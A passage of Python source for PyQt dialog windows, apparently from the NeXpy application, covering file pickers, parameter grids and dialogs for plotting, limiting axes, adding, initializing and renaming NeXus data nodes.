buttonbox = QtGui.QDialogButtonBox(self)\n buttonbox.setOrientation(QtCore.Qt.Horizontal)\n if save:\n buttonbox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|\n QtGui.QDialogButtonBox.Save)\n else:\n buttonbox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|\n QtGui.QDialogButtonBox.Ok)\n buttonbox.accepted.connect(self.accept)\n buttonbox.rejected.connect(self.reject)\n return buttonbox\n\n buttonbox = close_buttons #For backward compatibility\n\n def action_buttons(self, *items):\n layout = QtGui.QHBoxLayout()\n layout.addStretch()\n for label, action in items:\n button = QtGui.QPushButton(label)\n button.clicked.connect(action)\n layout.addWidget(button)\n layout.addStretch()\n return layout\n\n def filebox(self):\n \"\"\"\n Creates a text box and button for selecting a file.\n \"\"\"\n self.filebutton = QtGui.QPushButton(\"Choose File\")\n self.filebutton.clicked.connect(self.choose_file)\n self.filename = QtGui.QLineEdit(self)\n self.filename.setMinimumWidth(300)\n filebox = QtGui.QHBoxLayout()\n filebox.addWidget(self.filebutton)\n filebox.addWidget(self.filename)\n return filebox\n \n def directorybox(self, text=\"Choose Directory\"):\n \"\"\"\n Creates a text box and button for selecting a directory.\n \"\"\"\n self.directorybutton = QtGui.QPushButton(text)\n self.directorybutton.clicked.connect(self.choose_directory)\n self.directoryname = QtGui.QLineEdit(self)\n self.directoryname.setMinimumWidth(300)\n default = self.get_default_directory()\n if default:\n self.directoryname.setText(default)\n directorybox = QtGui.QHBoxLayout()\n directorybox.addWidget(self.directorybutton)\n directorybox.addWidget(self.directoryname)\n return directorybox\n\n def choose_file(self):\n \"\"\"\n Opens a file dialog and sets the file text box to the chosen path.\n \"\"\"\n dirname = self.get_default_directory(self.filename.text())\n filename = getOpenFileName(self, 'Open File', dirname)\n if os.path.exists(filename): # avoids problems if was selected\n dirname = os.path.dirname(filename)\n self.filename.setText(str(filename))\n self.set_default_directory(dirname)\n\n def get_filename(self):\n \"\"\"\n Returns the selected file.\n \"\"\"\n return self.filename.text()\n\n def choose_directory(self):\n \"\"\"\n Opens a file dialog and sets the directory text box to the chosen path.\n \"\"\"\n dirname = self.get_default_directory()\n dirname = QtGui.QFileDialog.getExistingDirectory(self, \n 'Choose Directory', \n dirname)\n if os.path.exists(dirname): 
# avoids problems if was selected\n self.directoryname.setText(str(dirname))\n self.set_default_directory(dirname)\n\n def get_directory(self):\n \"\"\"\n Returns the selected directory\n \"\"\"\n return self.directoryname.text()\n \n def get_default_directory(self, suggestion=None):\n '''return the most recent default directory for open/save dialogs'''\n if suggestion is None or not os.path.exists(suggestion):\n suggestion = self.default_directory\n if os.path.exists(suggestion):\n if not os.path.isdir(suggestion):\n suggestion = os.path.dirname(suggestion)\n suggestion = os.path.abspath(suggestion)\n return suggestion\n \n def set_default_directory(self, suggestion):\n '''define the default directory to use for open/save dialogs'''\n if os.path.exists(suggestion):\n if not os.path.isdir(suggestion):\n suggestion = os.path.dirname(suggestion)\n self.default_directory = suggestion\n\n def get_filesindirectory(self, prefix='', extension='.*', directory=None):\n \"\"\"\n Returns a list of files in the selected directory.\n \n The files are sorted using a natural sort algorithm that preserves the\n numeric order when a file name consists of text and index so that, e.g., \n 'data2.tif' comes before 'data10.tif'.\n \"\"\"\n if directory:\n os.chdir(directory)\n else:\n os.chdir(self.get_directory())\n if not extension.startswith('.'):\n extension = '.'+extension\n from glob import glob\n filenames = glob(prefix+'*'+extension)\n return sorted(filenames,key=natural_sort)\n\n def select_box(self, choices, default=None, slot=None):\n box = QtGui.QComboBox()\n box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n for choice in choices:\n box.addItem(choice)\n if default in choices:\n idx = box.findText(default)\n box.setCurrentIndex(idx)\n else:\n box.setCurrentIndex(0)\n if slot:\n box.currentIndexChanged.connect(slot)\n return box\n\n def select_root(self, slot=None, text='Select Root :', other=False):\n layout = QtGui.QHBoxLayout()\n box = QtGui.QComboBox()\n box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n roots = []\n for root in self.treeview.tree.NXroot:\n roots.append(root.nxname)\n for root in sorted(roots):\n box.addItem(root)\n if not other:\n try:\n node = self.treeview.get_node()\n idx = box.findText(node.nxroot.nxname)\n if idx >= 0:\n box.setCurrentIndex(idx)\n except Exception:\n box.setCurrentIndex(0)\n if slot:\n box.currentIndexChanged.connect(slot)\n layout.addWidget(QtGui.QLabel(text))\n layout.addWidget(box)\n layout.addStretch()\n if not other:\n self.root_box = box\n self.root_layout = layout\n else:\n self.other_root_box = box\n self.other_root_layout = layout\n return layout\n\n @property\n def root(self):\n return self.treeview.tree[self.root_box.currentText()]\n\n @property\n def other_root(self):\n return self.treeview.tree[self.other_root_box.currentText()]\n\n def select_entry(self, slot=None, text='Select Entry :', other=False):\n layout = QtGui.QHBoxLayout()\n box = QtGui.QComboBox()\n box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n entries = []\n for root in self.treeview.tree.NXroot:\n for entry in root.NXentry:\n entries.append(root.nxname+'/'+entry.nxname)\n for entry in sorted(entries):\n box.addItem(entry)\n if not other:\n try:\n node = self.treeview.get_node()\n idx = box.findText(node.nxroot.nxname+'/'+node.nxentry.nxname)\n if idx >= 0:\n box.setCurrentIndex(idx)\n except Exception:\n box.setCurrentIndex(0)\n if slot:\n box.currentIndexChanged.connect(slot)\n layout.addWidget(QtGui.QLabel(text))\n layout.addWidget(box)\n 
layout.addStretch()\n if not other:\n self.entry_box = box\n self.entry_layout = layout\n else:\n self.other_entry_box = box\n self.other_entry_layout = layout\n return layout\n\n @property\n def entry(self):\n return self.treeview.tree[self.entry_box.currentText()]\n\n @property\n def other_entry(self):\n return self.treeview.tree[self.other_entry_box.currentText()]\n\n def read_parameter(self, root, path):\n \"\"\"\n Read the value from the NeXus path.\n \n It will return 'None' if the path is not valid.\n \"\"\"\n try:\n value = root[path].nxdata\n if isinstance(value, np.ndarray) and value.size == 1:\n return np.float32(value)\n else:\n return value\n except NeXusError:\n return None \n\n def accept(self):\n \"\"\"\n Accepts the result.\n \n This usually needs to be subclassed in each dialog.\n \"\"\"\n self.accepted = True\n QtGui.QDialog.accept(self)\n \n def reject(self):\n \"\"\"\n Cancels the dialog without saving the result.\n \"\"\"\n self.accepted = False\n QtGui.QDialog.reject(self)\n\n def update_progress(self):\n \"\"\"\n Call the main QApplication.processEvents\n \n This ensures that GUI items like progress bars get updated\n \"\"\"\n self.mainwindow._app.processEvents()\n\n def progress_layout(self, save=False):\n layout = QtGui.QHBoxLayout()\n self.progress_bar = QtGui.QProgressBar()\n layout.addWidget(self.progress_bar)\n layout.addStretch()\n layout.addWidget(self.close_buttons(save))\n return layout\n\n def get_node(self):\n \"\"\"\n Return the node currently selected in the treeview\n \"\"\"\n return self.treeview.get_node()\n\n def confirm_action(self, query, information=None):\n msgBox = QtGui.QMessageBox()\n msgBox.setText(query)\n if information:\n msgBox.setInformativeText(information)\n msgBox.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)\n msgBox.setDefaultButton(QtGui.QMessageBox.Ok)\n return msgBox.exec_()\n\n\nclass GridParameters(OrderedDict):\n \"\"\"\n A dictionary of parameters to be entered in a dialog box grid.\n\n All keys must be strings, and valid Python symbol names, and all values\n must be of class GridParameter.\n \"\"\"\n def __init__(self, *args, **kwds):\n super(GridParameters, self).__init__(self)\n self.update(*args, **kwds)\n\n def __setitem__(self, key, value):\n if value is not None and not isinstance(value, GridParameter):\n raise ValueError(\"'%s' is not a GridParameter\" % value)\n OrderedDict.__setitem__(self, key, value)\n value.name = key\n\n def add(self, name, value=None, label=None, vary=None, slot=None,\n field=None):\n \"\"\"\n Convenience function for adding a Parameter:\n\n Example\n -------\n p = Parameters()\n p.add(name, value=XX, ...)\n\n is equivalent to:\n p[name] = Parameter(name=name, value=XX, ....\n \"\"\"\n self.__setitem__(name, GridParameter(value=value, name=name, label=label,\n vary=vary, slot=slot))\n\n def grid(self, header=True, title=None):\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n header_font = QtGui.QFont()\n header_font.setBold(True)\n row = 0\n if title:\n title_label = QtGui.QLabel(title)\n title_label.setFont(header_font)\n title_label.setAlignment(QtCore.Qt.AlignHCenter)\n grid.addWidget(title_label, row, 0, 1, 2)\n row += 1\n if header:\n parameter_label = QtGui.QLabel('Parameter')\n parameter_label.setFont(header_font)\n parameter_label.setAlignment(QtCore.Qt.AlignHCenter)\n grid.addWidget(parameter_label, 0, 0)\n value_label = QtGui.QLabel('Value')\n value_label.setFont(header_font)\n value_label.setAlignment(QtCore.Qt.AlignHCenter)\n grid.addWidget(value_label, 
row, 1)\n row += 1\n vary = False\n for p in self.values():\n label, value, checkbox = p.label, p.value, p.vary\n grid.addWidget(p.label, row, 0)\n grid.addWidget(p.box, row, 1, QtCore.Qt.AlignHCenter)\n if checkbox is not None:\n grid.addWidget(p.checkbox, row, 2, QtCore.Qt.AlignHCenter)\n vary = True\n row += 1\n if vary:\n fit_label = QtGui.QLabel('Fit?')\n fit_label.setFont(header_font)\n grid.addWidget(fit_label, 0, 2, QtCore.Qt.AlignHCenter)\n self.grid_layout = grid\n return grid\n\n def set_parameters(self):\n self.parameters = []\n for p in self.values():\n p.init_value = p.value\n if p.vary:\n self.parameters.append({p.name:p.value})\n\n def get_parameters(self, p):\n i = 0\n for key in [list(x)[0] for x in self.parameters]:\n self[key].value = p[i]\n i += 1\n\n def refine_parameters(self, residuals, method='nelder-mead', **opts):\n self.set_parameters()\n p0 = np.array([list(p.values())[0] for p in self.parameters])\n result = minimize(residuals, p0, method='nelder-mead',\n options={'xtol': 1e-6, 'disp': True})\n self.get_parameters(result.x)\n\n def restore_parameters(self):\n for p in self.values():\n p.value = p.init_value\n\n def save(self):\n for p in self.values():\n p.save()\n\n\nclass GridParameter(object):\n \"\"\"\n A Parameter is an object to be set in a dialog box grid.\n \"\"\"\n def __init__(self, name=None, value=None, label=None, vary=None, slot=None):\n \"\"\"\n Parameters\n ----------\n name : str, optional\n Name of the parameter.\n value : float, optional\n Numerical Parameter value or NXfield containing the initial value\n label : str, optional\n Label used in the dialog box.\n vary : bool or None, optional\n Whether the Parameter is fixed during a fit. \n slot : function or None, optional\n Function to be called when the parameter is changed. 
\n \"\"\"\n self.name = name\n self._value = value\n if isinstance(value, list) or isinstance(value, tuple):\n self.box = QtGui.QComboBox()\n self.box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n for v in value:\n self.box.addItem(str(v))\n if slot is not None:\n self.box.currentIndexChanged.connect(slot)\n else:\n self.box = QtGui.QLineEdit()\n self.box.setAlignment(QtCore.Qt.AlignRight)\n if value is not None:\n if isinstance(value, NXfield):\n if value.shape == ():\n self.field = value\n self.value = self.field.nxdata\n else:\n raise NeXusError('Cannot set a grid parameter to an array')\n else:\n self.field = None\n self.value = value\n if slot is not None:\n self.box.editingFinished.connect(slot)\n if vary is not None:\n self.checkbox = QtGui.QCheckBox()\n self.vary = vary\n self.init_value = self.value\n else:\n self.checkbox = self.vary = self.init_value = None\n self.label = QtGui.QLabel(label)\n\n def set(self, value=None, vary=None):\n \"\"\"\n Set or update Parameter attributes.\n\n Parameters\n ----------\n value : float, optional\n Numerical Parameter value.\n vary : bool, optional\n Whether the Parameter is fixed during a fit.\n \"\"\"\n if value is not None:\n self._val = value\n if vary is not None:\n self.vary = vary\n\n def __repr__(self):\n s = []\n if self.name is not None:\n s.append(\"'%s'\" % self.name)\n sval = repr(self.value)\n s.append(sval)\n return \"\" % ', '.join(s)\n\n def save(self):\n if isinstance(self.field, NXfield):\n self.field.nxdata = np.array(self.value).astype(self.field.dtype)\n\n @property\n def value(self):\n if isinstance(self.box, QtGui.QComboBox):\n return self.box.currentText()\n else:\n _value = self.box.text()\n try:\n return np.asscalar(np.array(_value).astype(self.field.dtype))\n except AttributeError:\n try:\n return float(_value)\n except ValueError:\n return _value\n\n @value.setter\n def value(self, value):\n self._value = value\n if value is not None:\n if isinstance(self.box, QtGui.QComboBox):\n idx = self.box.findText(value)\n if idx >= 0:\n self.box.setCurrentIndex(idx)\n else:\n if isinstance(value, NXfield):\n value = value.nxdata\n if isinstance(value, six.text_type):\n self.box.setText(value)\n else:\n self.box.setText('%.6g' % value)\n\n @property\n def vary(self):\n if self.checkbox is not None:\n return self.checkbox.isChecked()\n else:\n return None\n\n @vary.setter\n def vary(self, value):\n if self.checkbox is not None:\n if value:\n self.checkbox.setCheckState(QtCore.Qt.Checked)\n else:\n self.checkbox.setCheckState(QtCore.Qt.Unchecked)\n\n\nclass PlotDialog(BaseDialog):\n \"\"\"Dialog to plot arbitrary NeXus data in one or two dimensions\"\"\"\n \n def __init__(self, node, parent=None, fmt='o'):\n\n super(PlotDialog, self).__init__(parent)\n \n if isinstance(node, NXfield):\n self.group = node.nxgroup\n signal_name = node.nxname\n else:\n self.group = node\n signal_name = None\n\n self.fmt = fmt\n\n self.signal_combo = QtGui.QComboBox() \n for node in self.group.values():\n if isinstance(node, NXfield) and node.is_plottable():\n self.signal_combo.addItem(node.nxname)\n if self.signal_combo.count() == 0:\n raise NeXusError(\"No plottable field in group\")\n self.signal_combo.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n if signal_name:\n idx = self.signal_combo.findText(signal_name)\n if idx >= 0:\n self.signal_combo.setCurrentIndex(idx)\n else:\n signal_name = None\n self.signal_combo.currentIndexChanged.connect(self.choose_signal)\n \n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n 
self.grid.addWidget(QtGui.QLabel('Signal :'), 0, 0)\n self.grid.addWidget(self.signal_combo, 0, 1)\n self.choose_signal()\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(self.grid)\n self.layout.addWidget(self.close_buttons())\n self.setLayout(self.layout)\n\n self.setWindowTitle(\"Plot NeXus Data\")\n\n @property\n def signal(self):\n return self.group[self.signal_combo.currentText()]\n\n @property\n def ndim(self):\n return self.signal.ndim\n\n def choose_signal(self):\n row = 0\n self.axis_boxes = {}\n for axis in range(self.ndim):\n row += 1\n self.grid.addWidget(QtGui.QLabel(\"Axis %s: \" % axis), row, 0)\n self.axis_boxes[axis] = self.axis_box(axis)\n self.grid.addWidget(self.axis_boxes[axis], row, 1)\n while row < self.grid.rowCount() - 1:\n self.remove_axis(row)\n row += 1 \n\n def axis_box(self, axis):\n box = QtGui.QComboBox()\n for node in self.group.values():\n if isinstance(node, NXfield) and node is not self.signal:\n if self.check_axis(node, axis):\n box.addItem(node.nxname)\n if box.count() > 0:\n box.insertSeparator(0)\n box.insertItem(0,'NXfield index')\n return box\n\n def remove_axis(self, axis):\n row = axis + 1\n for column in range(2):\n item = self.grid.itemAtPosition(row, column)\n if item is not None:\n widget = item.widget()\n if widget is not None:\n widget.setVisible(False)\n self.grid.removeWidget(widget)\n widget.deleteLater() \n\n def check_axis(self, node, axis):\n if isinstance(node, NXgroup) or node.ndim > 1:\n return False\n axis_len = self.signal.shape[axis]\n if node.ndim == 0:\n node_len = 1\n else:\n node_len = node.shape[0]\n if node_len == axis_len or node_len == axis_len+1:\n return True\n else:\n return False\n\n def get_axis(self, axis):\n axis_name = self.axis_boxes[axis].currentText()\n if axis_name == 'NXfield index':\n return NXfield(range(self.signal.shape[axis]), \n name='index_%s' % axis)\n else:\n return self.group[axis_name]\n\n def get_axes(self):\n return [self.get_axis(axis) for axis in range(self.ndim)]\n\n def accept(self):\n data = NXdata(self.signal, self.get_axes(), title=self.signal.nxtitle)\n data.plot(fmt=self.fmt)\n super(PlotDialog, self).accept()\n\n \nclass LimitDialog(BaseDialog):\n \"\"\"Dialog to set plot window limits\n \n This is useful when it is desired to set the limits outside the data limits. 
\n \"\"\"\n \n def __init__(self, parent=None):\n\n super(LimitDialog, self).__init__(parent)\n \n from .plotview import plotview\n\n self.plotview = plotview\n \n layout = QtGui.QVBoxLayout()\n\n xmin_layout = QtGui.QHBoxLayout()\n xmin_layout.addWidget(QtGui.QLabel('xmin'))\n self.xmin_box = self.textbox()\n self.xmin_box.setValue(plotview.xaxis.min)\n xmin_layout.addWidget(self.xmin_box)\n layout.addLayout(xmin_layout)\n\n xmax_layout = QtGui.QHBoxLayout()\n xmax_layout.addWidget(QtGui.QLabel('xmax'))\n self.xmax_box = self.textbox()\n self.xmax_box.setValue(plotview.xaxis.max)\n xmax_layout.addWidget(self.xmax_box)\n layout.addLayout(xmax_layout)\n\n ymin_layout = QtGui.QHBoxLayout()\n ymin_layout.addWidget(QtGui.QLabel('ymin'))\n self.ymin_box = self.textbox()\n self.ymin_box.setValue(plotview.yaxis.min)\n ymin_layout.addWidget(self.ymin_box)\n layout.addLayout(ymin_layout)\n\n ymax_layout = QtGui.QHBoxLayout()\n ymax_layout.addWidget(QtGui.QLabel('ymax'))\n self.ymax_box = self.textbox()\n self.ymax_box.setValue(plotview.yaxis.max)\n ymax_layout.addWidget(self.ymax_box)\n layout.addLayout(ymax_layout)\n\n if plotview.ndim > 1:\n vmin_layout = QtGui.QHBoxLayout()\n vmin_layout.addWidget(QtGui.QLabel('vmin'))\n self.vmin_box = self.textbox()\n self.vmin_box.setValue(plotview.vaxis.min)\n vmin_layout.addWidget(self.vmin_box)\n layout.addLayout(vmin_layout)\n\n vmax_layout = QtGui.QHBoxLayout()\n vmax_layout.addWidget(QtGui.QLabel('vmax'))\n self.vmax_box = self.textbox()\n self.vmax_box.setValue(plotview.vaxis.max)\n vmax_layout.addWidget(self.vmax_box)\n layout.addLayout(vmax_layout)\n\n layout.addWidget(self.close_buttons()) \n self.setLayout(layout)\n\n self.setWindowTitle(\"Limit axes\")\n\n def textbox(self):\n from .plotview import NXTextBox\n textbox = NXTextBox()\n textbox.setAlignment(QtCore.Qt.AlignRight)\n textbox.setFixedWidth(75)\n return textbox\n\n def accept(self):\n xmin, xmax = self.xmin_box.value(), self.xmax_box.value() \n ymin, ymax = self.ymin_box.value(), self.ymax_box.value()\n if self.plotview.ndim > 1:\n vmin, vmax = self.vmin_box.value(), self.vmax_box.value()\n self.plotview.autoscale = False\n self.plotview.set_plot_limits(xmin, xmax, ymin, ymax, vmin, vmax)\n else:\n self.plotview.set_plot_limits(xmin, xmax, ymin, ymax)\n super(LimitDialog, self).accept()\n\n \nclass AddDialog(BaseDialog):\n \"\"\"Dialog to add a NeXus node\"\"\"\n\n data_types = ['char', 'float32', 'float64', 'int8', 'uint8', 'int16', \n 'uint16', 'int32', 'uint32', 'int64', 'uint64']\n \n def __init__(self, node, parent=None):\n\n super(AddDialog, self).__init__(parent)\n\n self.node = node\n\n class_layout = QtGui.QHBoxLayout()\n self.class_box = QtGui.QComboBox()\n if isinstance(self.node, NXgroup):\n names = ['NXgroup', 'NXfield']\n else:\n names = ['NXattr']\n for name in names:\n self.class_box.addItem(name)\n self.class_button = QtGui.QPushButton(\"Add\")\n self.class_button.clicked.connect(self.select_class)\n class_layout.addWidget(self.class_box)\n class_layout.addWidget(self.class_button)\n class_layout.addStretch() \n\n if isinstance(self.node, NXfield):\n self.setWindowTitle(\"Add NeXus Attribute\")\n else:\n self.setWindowTitle(\"Add NeXus Data\")\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(class_layout)\n self.layout.addWidget(self.close_buttons()) \n self.setLayout(self.layout)\n\n def select_class(self):\n self.class_name = self.class_box.currentText()\n if self.class_name == \"NXgroup\":\n self.layout.insertLayout(1, self.define_grid(\"NXgroup\"))\n elif 
self.class_name == \"NXfield\":\n self.layout.insertLayout(1, self.define_grid(\"NXfield\"))\n else:\n self.layout.insertLayout(1, self.define_grid(\"NXattr\"))\n self.class_button.setDisabled(True)\n self.class_box.setDisabled(True)\n\n def define_grid(self, class_name):\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n\n name_label = QtGui.QLabel()\n name_label.setAlignment(QtCore.Qt.AlignLeft)\n name_label.setText(\"Name:\")\n self.name_box = QtGui.QLineEdit()\n self.name_box.setAlignment(QtCore.Qt.AlignLeft)\n if class_name == \"NXgroup\":\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n combo_label.setText(\"Group Class:\")\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.select_combo)\n from .consoleapp import _mainwindow\n standard_groups = sorted(list(set([g for g in \n _mainwindow.nxclasses[self.node.nxclass][2]])))\n for name in standard_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.insertSeparator(self.combo_box.count())\n other_groups = sorted([g for g in _mainwindow.nxclasses if g not in\n standard_groups])\n for name in other_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(combo_label, 0, 0)\n grid.addWidget(self.combo_box, 0, 1)\n grid.addWidget(name_label, 1, 0)\n grid.addWidget(self.name_box, 1, 1)\n elif class_name == \"NXfield\":\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.select_combo)\n from .consoleapp import _mainwindow\n fields = sorted(list(set([g for g in \n _mainwindow.nxclasses[self.node.nxclass][1]])))\n for name in fields:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[self.node.nxclass][1][name][2], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n grid.addWidget(self.combo_box, 0, 2)\n value_label = QtGui.QLabel()\n value_label.setAlignment(QtCore.Qt.AlignLeft)\n value_label.setText(\"Value:\")\n self.value_box = QtGui.QLineEdit()\n self.value_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(value_label, 1, 0)\n grid.addWidget(self.value_box, 1, 1)\n units_label = QtGui.QLabel()\n units_label.setAlignment(QtCore.Qt.AlignLeft)\n units_label.setText(\"Units:\")\n self.units_box = QtGui.QLineEdit()\n self.units_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(units_label, 2, 0)\n grid.addWidget(self.units_box, 2, 1)\n type_label = QtGui.QLabel()\n type_label.setAlignment(QtCore.Qt.AlignLeft)\n type_label.setText(\"Datatype:\")\n self.type_box = QtGui.QComboBox()\n for name in self.data_types:\n self.type_box.addItem(name)\n self.type_box.insertSeparator(0)\n self.type_box.insertItem(0, 'auto')\n self.type_box.setCurrentIndex(0)\n self.type_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(type_label, 3, 0)\n grid.addWidget(self.type_box, 3, 1)\n else:\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n value_label = QtGui.QLabel()\n value_label.setAlignment(QtCore.Qt.AlignLeft)\n 
value_label.setText(\"Value:\")\n self.value_box = QtGui.QLineEdit()\n self.value_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(value_label, 1, 0)\n grid.addWidget(self.value_box, 1, 1)\n type_label = QtGui.QLabel()\n type_label.setAlignment(QtCore.Qt.AlignLeft)\n type_label.setText(\"Datatype:\")\n self.type_box = QtGui.QComboBox()\n for name in self.data_types:\n self.type_box.addItem(name)\n self.type_box.insertSeparator(0)\n self.type_box.insertItem(0, 'auto')\n self.type_box.setCurrentIndex(0)\n self.type_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(type_label, 2, 0)\n grid.addWidget(self.type_box, 2, 1)\n grid.setColumnMinimumWidth(1, 200)\n return grid\n\n def select_combo(self):\n self.set_name(self.combo_box.currentText())\n \n def get_name(self):\n return self.name_box.text()\n\n def set_name(self, name):\n if self.class_name == 'NXgroup':\n name = name[2:]\n self.name_box.setText(name)\n\n def get_value(self):\n value = self.value_box.text()\n if value:\n dtype = self.get_type()\n if dtype == \"char\":\n return value\n else:\n from .consoleapp import _shell\n try:\n return eval(value, {\"__builtins__\": {}}, _shell)\n except Exception:\n return str(value)\n else:\n return None\n\n def get_units(self):\n return self.units_box.text()\n\n def get_type(self):\n if self.class_name == 'NXgroup':\n return self.combo_box.currentText()\n else:\n dtype = self.type_box.currentText()\n if dtype == \"auto\":\n return None\n else:\n return dtype \n\n def accept(self):\n name = self.get_name()\n if self.class_name == \"NXgroup\":\n nxclass = self.get_type()\n if name:\n self.node[name] = NXgroup(nxclass=nxclass)\n else:\n self.node.insert(NXgroup(nxclass=nxclass))\n logging.info(\"'%s' added to '%s'\" \n % (self.node[name], self.node.nxpath)) \n elif name:\n value = self.get_value()\n dtype = self.get_type()\n if value is not None:\n if self.class_name == \"NXfield\":\n self.node[name] = NXfield(value, dtype=dtype)\n logging.info(\"'%s' added to '%s'\" \n % (name, self.node.nxpath)) \n units = self.get_units()\n if units:\n self.node[name].attrs['units'] = units\n else:\n self.node.attrs[name] = NXattr(value, dtype=dtype)\n logging.info(\"Attribute '%s' added to '%s'\" \n % (name, self.node.nxpath)) \n super(AddDialog, self).accept()\n\n \nclass InitializeDialog(BaseDialog):\n \"\"\"Dialog to initialize a NeXus field node\"\"\"\n\n data_types = ['char', 'float32', 'float64', 'int8', 'uint8', 'int16', \n 'uint16', 'int32', 'uint32', 'int64', 'uint64']\n \n def __init__(self, node, parent=None):\n\n super(InitializeDialog, self).__init__(parent)\n \n self.node = node\n\n self.setWindowTitle(\"Initialize NeXus Data\")\n\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n\n name_label = QtGui.QLabel()\n name_label.setAlignment(QtCore.Qt.AlignLeft)\n name_label.setText(\"Name:\")\n self.name_box = QtGui.QLineEdit()\n self.name_box.setAlignment(QtCore.Qt.AlignLeft)\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.select_combo)\n from .consoleapp import _mainwindow\n fields = sorted(list(set([g for g in \n _mainwindow.nxclasses[self.node.nxclass][1]])))\n for name in fields:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[self.node.nxclass][1][name][2], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n grid.addWidget(self.combo_box, 
0, 2)\n type_label = QtGui.QLabel()\n type_label.setAlignment(QtCore.Qt.AlignLeft)\n type_label.setText(\"Datatype:\")\n self.type_box = QtGui.QComboBox()\n for name in self.data_types:\n self.type_box.addItem(name)\n self.type_box.setCurrentIndex(0)\n self.type_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(type_label, 2, 0)\n grid.addWidget(self.type_box, 2, 1)\n shape_label = QtGui.QLabel()\n shape_label.setAlignment(QtCore.Qt.AlignLeft)\n shape_label.setText(\"Shape:\")\n self.shape_box = QtGui.QLineEdit()\n self.shape_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(shape_label, 3, 0)\n grid.addWidget(self.shape_box, 3, 1)\n grid.setColumnMinimumWidth(1, 200)\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(grid)\n self.layout.addWidget(self.close_buttons()) \n self.setLayout(self.layout)\n\n def select_combo(self):\n self.set_name(self.combo_box.currentText())\n \n def get_name(self):\n return self.name_box.text()\n\n def set_name(self, name):\n self.name_box.setText(name)\n\n def get_type(self):\n dtype = self.type_box.currentText()\n return dtype \n\n def get_shape(self):\n import ast\n try:\n shape = ast.literal_eval(self.shape_box.text())\n try:\n it = iter(shape)\n return shape\n except TypeError:\n if isinstance(shape, numbers.Integral):\n return (shape,)\n else:\n raise NeXusError('Invalid shape')\n except ValueError:\n raise NeXusError('Invalid shape')\n\n def accept(self):\n name = self.get_name()\n if name:\n dtype = self.get_type()\n if dtype is None:\n dtype = np.float64\n shape = self.get_shape()\n self.node[name] = NXfield(dtype=dtype, shape=shape)\n logging.info(\"'%s' initialized in '%s'\" \n % (self.node[name], self.node.nxpath)) \n super(InitializeDialog, self).accept()\n\n \nclass RenameDialog(BaseDialog):\n \"\"\"Dialog to rename a NeXus node\"\"\"\n\n def __init__(self, node, parent=None):\n\n super(RenameDialog, self).__init__(parent)\n\n self.node = node\n\n self.setWindowTitle(\"Rename NeXus data\")\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(self.define_grid())\n self.layout.addWidget(self.close_buttons()) \n self.setLayout(self.layout)\n\n def define_grid(self):\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n name_label = QtGui.QLabel()\n name_label.setAlignment(QtCore.Qt.AlignLeft)\n name_label.setText(\"New Name:\")\n self.name_box = QtGui.QLineEdit(self.node.nxname)\n self.name_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n self.combo_box = None\n if isinstance(self.node, NXgroup) and self.node.nxclass != 'NXroot':\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n combo_label.setText(\"New Class:\")\n self.combo_box = QtGui.QComboBox()\n from .consoleapp import _mainwindow\n parent_class = self.node.nxgroup.nxclass\n standard_groups = sorted(list(set([g for g in \n _mainwindow.nxclasses[parent_class][2]])))\n for name in standard_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 